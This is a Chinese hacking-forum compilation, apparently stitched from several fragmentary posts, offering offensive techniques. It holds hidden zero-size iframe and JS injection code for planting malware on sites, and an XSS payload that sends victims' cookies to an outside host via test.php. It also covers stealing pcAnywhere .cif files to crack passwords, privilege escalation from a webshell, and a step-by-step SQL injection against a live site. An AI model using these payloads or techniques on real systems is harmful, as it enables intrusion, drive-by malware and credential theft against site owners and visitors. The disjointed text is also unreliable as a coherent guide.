MK2-风 之谷

 Author: jianxin [80sec]

EMail: jianxin#80sec.com
...

跨站脚本=XSS攻击测试语句大全

url: %3C=<   %3E=>   %22="   %2e=.   (=%28   '=%27    )=%29   /=%2F   ;=%3B
...

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>
...

C:\Documents and Settings\All Users\「开始」菜单\程序\     －－‘看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径。
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ －－‘看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，然后登陆
...

作者：Flyh4t

校内网在发blog时对插入图片过滤不严格，存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发：

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

说到花了九牛二虎的力气获得了一个webshell，
当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～
嘻嘻～～好跟我来，看看有什么可以利用的来提升权限

第一
如果服务器上有装了pcanywhere服务端，管理员为了管理方便
也给了我们方便，到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
...

对于现在,各种入侵工具已是泛滥,有利有弊,不过我们大家(有些只会用工具而又自称为黑客的)都不应忘记我们本应有的技术.
今天我就来发个贴子,如果看了没什么用的,那就关了,如果看了受益的,就回个贴,也算是一种支持!我还会继续努力~

前言
Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。
本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
文件传输
...

四、跨站攻击的挖掘
知道了XSS攻击的之后，我们怎样才能挖掘网站的XSS漏洞呢？


想挖掘网站的XSS漏洞，我们必须要有基本的脚本底子，鉴于我们叉子的电脑基础问题，这里我就先为大家解释一下标准测试代码<Script>alert(“text”)< /Script>的意思，要注意看哦！其中的text可以改为任何字，如果存在XSS漏洞，我们使用这段代码进行XSS攻击后，浏览相的应页面就会弹出包含text这个字符的提示框，如图4。
...

下面我们来看一下php注入的过程。

因为是网络上的主机，这里仅作注入测试，不作进一步的具体操作。我们首先在网站后面加个单引号字符，返回错误信息，证明该网站有可能存在注入。再提交 and 1=1 正常显示，提交and 1=2显示错误，好，继续提交union注入语句。http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 同样显示错误信息。但网站路径我们可以知道，并且是一台linux系统/home/caiqing/www/view_detail.php，继续提交